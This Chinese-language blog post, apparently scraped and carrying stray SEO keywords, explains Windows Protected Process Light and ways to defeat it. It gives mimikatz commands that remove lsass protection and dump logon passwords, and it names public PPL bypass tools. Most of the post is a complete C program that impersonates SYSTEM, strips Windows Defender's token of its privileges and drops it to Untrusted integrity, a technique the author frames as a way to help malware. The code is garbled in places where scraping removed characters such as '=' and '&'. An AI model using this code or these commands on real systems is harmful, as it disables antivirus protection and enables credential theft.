新做的网站如何备案,wordpress教程网,中文网址价格,应用商店app下载PPL
Windows Vista / Server 2008引入 了受保护进程的概念#xff0c;其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并符合DRM #xff08;数字版权管理#xff09;要求。Microsoft开发了此机制#xff0c;以便您的媒体播放器可以读取例如蓝光#xff0c;同时…PPL
Windows Vista / Server 2008引入 了受保护进程的概念其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并符合DRM 数字版权管理要求。Microsoft开发了此机制以便您的媒体播放器可以读取例如蓝光同时 防止您复制其内容。当时的要求是映像文件即可执行文件必须使用特殊的Windows Media证 书进行数字签名如Windows Internals的“受保护的过程”部分所述。
在实践中一个受保护的过程可通过未保护的过程仅具有非常有限的权限访问 PROCESS_QUERY_LIMITED_INFORMATION PROCESS_SET_LIMITED_INFORMATION PROCESS_TERMINATE 和 PROCESS_SUSPEND_RESUME 。对于某些高度敏感的过程甚至可以减少 此设置。
从Windows 8.1 / Server 2012 R2开始Microsoft引入了Protected Process Light的概 念。PPL实际上是对先前“受保护过程”模型的扩展并添加了“保护级别”的概念这基本上意味着 某些PPL进程可以比其他进程受到更多保护
进程保护的级别是会被添加到EPROCESS的内核结构中并且具体存储再其Protection成员中。该protection成员是一个PS_PROTECTION结构
这个_PS_PROTECTION 结构如下前3位代表保护 Type 它定义过程是 PP 还是 PPL 后4位代表 Signer 类 型即实际的保护类型
typedef struct _PS_PROTECTION {
union {
UCHAR Level;
struct {
UCHAR Type : 3;
UCHAR Audit : 1; // Reserved
UCHAR Signer : 4;
};
};
} PS_PROTECTION, *PPS_PROTECTION;
对于这个结构来说前3位代表保护 Type 它定义过程是 PP 还是 PPL 后4位代表 Signer 类 型即实际的保护类型
typedef enum _PS_PROTECTED_TYPE {PsProtectedTypeNone 0,PsProtectedTypeProtectedLight 1,PsProtectedTypeProtected 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;
typedef enum _PS_PROTECTED_SIGNER {PsProtectedSignerNone 0, // 0PsProtectedSignerAuthenticode, // 1PsProtectedSignerCodeGen, // 2PsProtectedSignerAntimalware, // 3PsProtectedSignerLsa, // 4PsProtectedSignerWindows, // 5PsProtectedSignerWinTcb, // 6PsProtectedSignerWinSystem, // 7PsProtectedSignerApp, // 8PsProtectedSignerMax // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;进程的保护级别就通过上面这两个值的组和来定义 由此借助API ZwQueryInformationProcess 我们就可以判断进程的PPL保护等级
bool FindProcessProtect()
{PS_PROTECTION ProtectInfo { 0 };NTSTATUS ntStatus ZwQueryInformationProcess(NtCurrentProcess(),ProcessProtectionInformation, ProtectInfo, sizeof(ProtectInfo), NULL);bool false;bool Result2 false;if (NT_SUCCESS(ntStatus)){Result1 ProtectInfo.Type PsProtectedTypeNone ProtectInfo.Signer PsProtectedSignerNone;PROCESS_EXTENDED_BASIC_INFORMATION ProcessExtenedInfo { 0 };ntStatus ZwQueryInformationProcess(NtCurrentProcess(),ProcessBasicInformation, ProcessExtenedInfo, sizeof(ProcessExtenedInfo), NULL);if (NT_SUCCESS(ntStatus)){Result2 ProcessExtenedInfo.IsProtectedProcess false ProcessExtenedInfo.IsSecureProcess false;}}return Result2 Result1;
}Pr.ProcessTypeSignerLevel1wininit.exeProtected LightWinTcbPsProtectedSignerWinTcb-Light2svchost.exeProtected LightLsaPsProtectedSignerWindows-Light3MsMpEng.exeProtected LightAntimalwarePsProtectedSignerAntimalwareLight
上面的表中我们可以看见PPL内部也是分级的
wininit.exe signer为WinTcb它是 PPL 的最高可能值那么它可以访问其他两个进程然后 svchost.exe可以访问MsMpEng.exe因为signer级别Lsa高于Antimalware最后MsMpEng.exe不 能访问其他两个进程因为它具有最低级别不能访问其他两个进程因为它具有最低级别。
我们也可以去 LSA
LSA 即 RunAsPPL 虽然 lsass 进程有 PPL 微软为了防止非管理非 PPL 进程通过开放访问或篡改 PPL 进程中的代码和数据推出了 LSA 但是在一般情况下是并没有启用的有可能是防御方通过注册表打开了PPL或者是EDR开了
这里我以我的win10虚拟机为例可以看见这个lsass.exe进程是没有开启PPL保护的 这时候我们使用mimikaz密码是可以正常抓到的 手动开启LSA的方法是找到注册表里面的HKLM\SYSTEM\CurrentControlSet\Control\Lsa 然后添加一个 DWORD 值 RunAsPPL 并把值从0改为1即可之后重启电脑 这时候我们再次打开Processmonitor可以看见PPL已经被加上了 这时候我们再去使用mimikaz抓密码很明显不行 我们可以去gitee上找到mimikaz的源码看看是怎么定义这个错误的 可以看见这里也是使用OpenProcess来打开进程获得句柄我们当然知道这里低权限进程是没有办法打开高权限进程的 之后if分支判断如果是INVALID_HANDLE_VALUE那么进入else分支通过GetLastError把错误码打印出来也就是我们看见的0x000005 mimdrv.sys
mimikaz里面提供了mimidrv.sys来绕过在加载之后就可以关闭LSA保护
!
!procoessprotect /process:lsass.exe /remove
sekurlsa::logonpasswords不过直到我复现的2024.10这个时间节点这个驱动的证书已经被吊销 PPL Fault
这里搬一个2023年4月份的项目主要PPL Killer实在太老一般这些PPL绕过的工具在公开了之后很快就会被相关安全人员写入规则
gabriellandau/PPLFault (github.com)
By Gabriel Landau at Elastic Security.From PPLdump Is Dead. Long Live PPLdump! presented at Black Hat Asia 2023.虽然现在应该是用不了了正常打补丁的win但是思路还是可以说一下
也是通过把WinTCb的ppl拿到然后通过高权限只要比Lsa高就行
[] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll[] Ready. Spawning WinTcb.[] SpawnPPL: Waiting for child process to finish.PPL medic
https://github.com/itm4n/PPLmedic
也是一个公开的项目应该也是被杀软标记了
摘除Windows defender的令牌
这里要提一点在Win Pc的版本中对Win Defender有补丁所以测试环境移到Win Server 2019上进行
通过Process Hacker查看WIndows Defender的令牌我们可以看见如下 我们可以看见Win Defender以System权限启动 SYSTEM 用户可以完全控制令牌这意味着除非有其他机制保护令牌否则以 SYSTEM 身份运行的线 程可以修改令牌但是在windows中并没有保护令牌的机制在 Process Hacker中 我们可以看到定义 的完整性为6种
Untrusted – processes that are logged on anonymously are automatically designated
as UntrustedLow – The Low integrity level is the level used by default for interaction with the
Internet. As long as Internet Explorer is run in its default state, Protected Mode, all files
and processes associated with it are assigned the Low integrity level. Some folders,
such as the Temporary Internet Folder, are also assigned the Low integrity level by
default.Medium – Medium is the context that most objects will run in. Standard users receive
the Medium integrity level, and any object not explicitly designated with a lower or
higher integrity level is Medium by default.High – Administrators are granted the High integrity level. This ensures that
Administrators are capable of interacting with and modifying objects assigned Medium
or Low integrity levels, but can also act on other objects with a High integrity level,
which standard users can not do.System – As the name implies, the System integrity level is reserved for the system.
The Windows kernel and core services are granted the System integrity level. Being
even higher than the High integrity level of Administrators protects these core
functions from being affected or compromised even by Administrators.Installer – The Installer integrity level is a special case and is the highest of all integrity
levels. By virtue of being equal to or higher than all other WIC integrity levels, objects
assigned the Installer integrity level are also able to uninstall all other objects.一般匿名登录的进程被自动指定为Untrusted
比如我们的浏览器它在系统上执行一些特权操作时实际上都不是浏览器本身执行而是代理给到了其他非沙盒的进程来代表它来执行操作。如果在这种情况下沙盒进程被利用那么其他它造成的损害就会比较有限比如我们下载到了一些恶意软件会很快被识别出来并被Win Defender隔离 简而言之Untrusted的进程对计算机的操作非常有限
所以我们可以换一个思路不一定要提升我们恶意软件的进程也可以降低这些杀软的进程等级
实现
核心函数微软是给了demo的但是要稍微改一下名字叫做在 C 中启用和禁用特权
BOOL SetPricilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege
)
{TOKEN_PRIVILEGES tp;LUID luid;//检索本地唯一标识符if(!LookupPrivilegeValue(NULL,lpszPrivilege,luid)){printf(LookupPricilegeValue Error:%d\n,GetLastError());return FALSE;}tp.PrivilegeCount 1;tp.Privileges[0].Luid luid;if(bEnablePrivilege)//无论是否有bEnable标志我们都设置特权标志为SE_PRIVILEGE_REMOVED方便我们待会换掉原进程的令牌tp.Privileges[0].Attributes SE_PRIVILEGE_REMOVED;elsetp.Privileges[0].Attributes SE_PRIVILEGE_REMOVED;if (!AdjustTokenPrivileges(hToken,FALSE,tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){printf(AdjustTokenPrivileges Error:%d\n,GetLastError());return FALSE;}//如果失败返回FALSEif(GetLastError() ERROR_NOT_ALL_ASSIGNED){printf(The token does not have the specified privilege\n);return FALSE;}
}上面用到的结构和函数我也是边看边学
typedef struct _TOKEN_PRIVILEGES {DWORD PrivilegeCount;LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
} TOKEN_PRIVILEGES, *PTOKEN_PRIVILEGES;BOOL AdjustTokenPrivileges([in] HANDLE TokenHandle,//包含要修改的权限的访问令牌的句柄。 句柄必须具有TOKEN_ADJUST_PRIVILEGES令牌的访问权限[in] BOOL DisableAllPrivileges,[in, optional] PTOKEN_PRIVILEGES NewState,//指向 TOKEN_PRIVILEGES 结构的指针[in] DWORD BufferLength,//结构大小[out, optional] PTOKEN_PRIVILEGES PreviousState,[out, optional] PDWORD ReturnLength
);Return codeDescriptionERROR_SUCCESS函数调整了所有指定的特权ERROR_NOT_ALL_ASSIGNED令牌不具有NewState参数中指定的一个或多个权限。即使没有调整特权函数也可能成功执行此错误值。PreviousState参数指示已调整的权限。
提权函数启用当前进程的SE_DEBUG_NAME 权限
bool EnableDebugPrivilege(){HANDLE hToken;LUID sedebugnameValue;TOKEN_PRIVILEGES tkp;if(!OpenProcessToken(GetCurrentProcess(),TOEKN_ADJUST_PRIVILEGES | TOKEN_QUERY,hToken)){printf(OpenProcessTokenError:%d\n,GetLastError());return FALSE;}if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,sedebugnameValue)){printf(LookupPrivilegeValue Error:%d\n,GetLastError());CloseHandle(hToken);return false;}tkp.PrivilegeCount 1;tkp,Privileges[0].Luid sedebugnameValue;tkp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;if(!AdjustTokenPrivileges(hToken,FALSE,tkp,sizeof(tkp),NULL,NULL)){CloseHandle(hToken);printf(AdjustTokenPrivileges Error:%d\n,GetLastError());return false;}
}上面用到的api
BOOL OpenProcessToken([in] HANDLE ProcessHandle,//打开访问令牌的进程句柄[in] DWORD DesiredAccess,[out] PHANDLE TokenHandle//返回token的句柄
);通过获取winlogon.exe这个进程的令牌调用ImpersonateLoggedOnUser模拟系统用户获取权限
wchar_t procname[80] Lwinlogon.exe;int pid getpid(procname);HANDLE phandle OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);HANDLE ptoken;OpenProcessToken(phandle, TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_DUPLICATE,
ptoken);//拿到winlogon的权限if (ImpersonateLoggedOnUser(ptoken)) {printf([*] Impersonated System!\n);}else {printf([-] Failed to impersonate System...\n);}
CloseHandle(phandle);//防止泄漏
CloseHandle(ptoken);在这之后打开MsMpEng
LUID sedebugnameValue;
wchar_t procname2[80] LMsMpEng.exe;
pid getpid(procname2);
phandle OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);//也就是这里有补丁目前貌似在新版win里面打不开这个进程
if (phandle ! INVALID_HANDLE_VALUE) {printf([*] Opened Target Handle\n);
}
else {printf([-] Failed to open Process Handle\n);
}这里的PROCESS_QUERY_LIMITED_INFORMATION对应我们OpenProcessToken需要的权限不需要多拿 然后就是token的替换
BOOL token OpenProcessToken(phandle, TOKEN_ALL_ACCESS, ptoken);
if (token) {printf([*] Opened Target Token Handle\n);
}
else {printf([-] Failed to open Target Token Handle\n);
}
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, sedebugnameValue);
TOKEN_PRIVILEGES tkp;tkp.PrivilegeCount 1;
tkp.Privileges[0].Luid sedebugnameValue;
tkp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;if (!AdjustTokenPrivileges(ptoken, FALSE, tkp, sizeof(tkp), NULL, NULL)) {
printf([-] Failed to Adjust Tokens Privileges\n);
return 0;
}
之后调用SetPrivilege 将所有Token去掉
SetPrivilege(ptoken, SE_DEBUG_NAME, TRUE);
SetPrivilege(ptoken, SE_CHANGE_NOTIFY_NAME, TRUE);
SetPrivilege(ptoken, SE_TCB_NAME, TRUE);
SetPrivilege(ptoken, SE_IMPERSONATE_NAME, TRUE);
SetPrivilege(ptoken, SE_LOAD_DRIVER_NAME, TRUE);
SetPrivilege(ptoken, SE_RESTORE_NAME, TRUE);
SetPrivilege(ptoken, SE_BACKUP_NAME, TRUE);
SetPrivilege(ptoken, SE_SECURITY_NAME, TRUE);
SetPrivilege(ptoken, SE_SYSTEM_ENVIRONMENT_NAME, TRUE);
SetPrivilege(ptoken, SE_INCREASE_QUOTA_NAME, TRUE);
SetPrivilege(ptoken, SE_TAKE_OWNERSHIP_NAME, TRUE);
SetPrivilege(ptoken, SE_INC_BASE_PRIORITY_NAME, TRUE);
SetPrivilege(ptoken, SE_SHUTDOWN_NAME, TRUE);
SetPrivilege(ptoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);SECURITY_MANDATORY_UNTRUSTED_RID 是一个常量用于表示一个不受信任的安全完整性级别
DWORD integrityLevel SECURITY_MANDATORY_UNTRUSTED_RID;然后再将完整性设置为 Untrusted Revision 为 SID_REVISION 表示SID结构的版本号 SubAuthorityCount 为1表示SID中子权限数组 SubAuthority 的元素数量 IdentifierAuthority.Value[5] 为16表示用于表示完整性级别的标识符授权 SubAuthority[0] 为 integrityLevel 表示进程的完整性级别它是一个整数值
SID integrityLevelSid{};
integrityLevelSid.Revision SID_REVISION;
integrityLevelSid.SubAuthorityCount 1;
integrityLevelSid.IdentifierAuthority.Value[5] 16;
integrityLevelSid.SubAuthority[0] integrityLevel;
上面SID结构的定义 最后创建一个 TOKEN_MANDATORY_LABEL 结构体变量 tokenIntegrityLevel 表示进程的安全令牌中的强制 完整性级别然后通过 SetTokenInformation 将完整性设置为 Untrusted
TOKEN_MANDATORY_LABEL tokenIntegrityLevel {};
tokenIntegrityLevel.Label.Attributes SE_GROUP_INTEGRITY;
tokenIntegrityLevel.Label.Sid integrityLevelSid;
if (!SetTokenInformation(ptoken,TokenIntegrityLevel,tokenIntegrityLevel,sizeof(TOKEN_MANDATORY_LABEL) GetLengthSid(integrityLevelSid)))完整demo
#include Windows.h
#include stdio.h
#include iostream
#include TlHelp32.h
#include conio.h
bool EnableDebugPrivilege()
{HANDLE hToken;LUID sedebugnameValue;TOKEN_PRIVILEGES tkp;if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, hToken)){return FALSE;}if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, sedebugnameValue)){CloseHandle(hToken);return false;}tkp.PrivilegeCount 1;tkp.Privileges[0].Luid sedebugnameValue;tkp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;if (!AdjustTokenPrivileges(hToken, FALSE, tkp, sizeof(tkp), NULL, NULL)){CloseHandle(hToken);return false;}return true;
}
int getpid(LPCWSTR procname) {DWORD procPID 0;LPCWSTR processName L;PROCESSENTRY32 processEntry {};processEntry.dwSize sizeof(PROCESSENTRY32);HANDLE snapshot CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, procPID);if (Process32First(snapshot, processEntry)){while (_wcsicmp(processName, procname) ! 0){Process32Next(snapshot, processEntry);processName processEntry.szExeFile;procPID processEntry.th32ProcessID;}printf([] Got %ls PID: %d\n, procname, procPID);}return procPID;}
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
luid)) // receives LUID of privilege
{printf(LookupPrivilegeValue error: %u\n, GetLastError());return FALSE;
}
tp.PrivilegeCount 1;
tp.Privileges[0].Luid luid;
if (bEnablePrivilege)tp.Privileges[0].Attributes SE_PRIVILEGE_REMOVED;
elsetp.Privileges[0].Attributes SE_PRIVILEGE_REMOVED;
if (!AdjustTokenPrivileges(hToken,FALSE,tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL))
{printf(AdjustTokenPrivileges error: %u\n, GetLastError());return FALSE;
}
if (GetLastError() ERROR_NOT_ALL_ASSIGNED)
{printf(The token does not have the specified privilege\n);return FALSE;
}return TRUE;
}
int main(int argc, char** argv)
{
LUID sedebugnameValue;
EnableDebugPrivilege();
wchar_t procname[80] Lwinlogon.exe;
int pid getpid(procname);
HANDLE phandle OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
HANDLE ptoken;
OpenProcessToken(phandle, TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_DUPLICATE,ptoken);
if (ImpersonateLoggedOnUser(ptoken)) {printf([*] Impersonated System!\n);
}
else {printf([-] Failed to impersonate System...\n);
}
CloseHandle(phandle);
CloseHandle(ptoken);
wchar_t procname2[80] LMsMpEng.exe;
pid getpid(procname2);
printf([*] Bypass Defender...\n);
phandle OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
if (phandle ! INVALID_HANDLE_VALUE) {printf([*] Opened Target Handle\n);
}
else {printf([-] Failed to open Process Handle:%d\n, GetLastError());
}
BOOL token OpenProcessToken(phandle, TOKEN_ALL_ACCESS, ptoken);
if (token) {printf([*] Opened Target Token Handle\n);
}
else {printf([-] Failed to open Target Token Handle : %d\n, GetLastError());
}
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, sedebugnameValue);
TOKEN_PRIVILEGES tkp;
tkp.PrivilegeCount 1;
tkp.Privileges[0].Luid sedebugnameValue;
tkp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;if (!AdjustTokenPrivileges(ptoken, FALSE, tkp, sizeof(tkp), NULL, NULL)) {printf([-] Failed to Adjust Tokens Privileges\n);return 0;
}SetPrivilege(ptoken, SE_DEBUG_NAME, TRUE);
SetPrivilege(ptoken, SE_CHANGE_NOTIFY_NAME, TRUE);
SetPrivilege(ptoken, SE_TCB_NAME, TRUE);
SetPrivilege(ptoken, SE_IMPERSONATE_NAME, TRUE);
SetPrivilege(ptoken, SE_LOAD_DRIVER_NAME, TRUE);
SetPrivilege(ptoken, SE_RESTORE_NAME, TRUE);
SetPrivilege(ptoken, SE_BACKUP_NAME, TRUE);
SetPrivilege(ptoken, SE_SECURITY_NAME, TRUE);
SetPrivilege(ptoken, SE_SYSTEM_ENVIRONMENT_NAME, TRUE);
SetPrivilege(ptoken, SE_INCREASE_QUOTA_NAME, TRUE);
SetPrivilege(ptoken, SE_TAKE_OWNERSHIP_NAME, TRUE);
SetPrivilege(ptoken, SE_INC_BASE_PRIORITY_NAME, TRUE);
SetPrivilege(ptoken, SE_SHUTDOWN_NAME, TRUE);
SetPrivilege(ptoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);
printf([*] Removed All Privileges\n);DWORD integrityLevel SECURITY_MANDATORY_UNTRUSTED_RID;
SID integrityLevelSid{};
integrityLevelSid.Revision SID_REVISION;
integrityLevelSid.SubAuthorityCount 1;
integrityLevelSid.IdentifierAuthority.Value[5] 16;
integrityLevelSid.SubAuthority[0] integrityLevel;TOKEN_MANDATORY_LABEL tokenIntegrityLevel {};
tokenIntegrityLevel.Label.Attributes SE_GROUP_INTEGRITY;
tokenIntegrityLevel.Label.Sid integrityLevelSid;
if (!SetTokenInformation(ptoken,TokenIntegrityLevel,tokenIntegrityLevel,sizeof(TOKEN_MANDATORY_LABEL) GetLengthSid(integrityLevelSid)))
{printf(SetTokenInformation failed\n);
}
else {printf([*] Token Integrity set to Untrusted\n);
}
CloseHandle(ptoken);
CloseHandle(phandle);
}
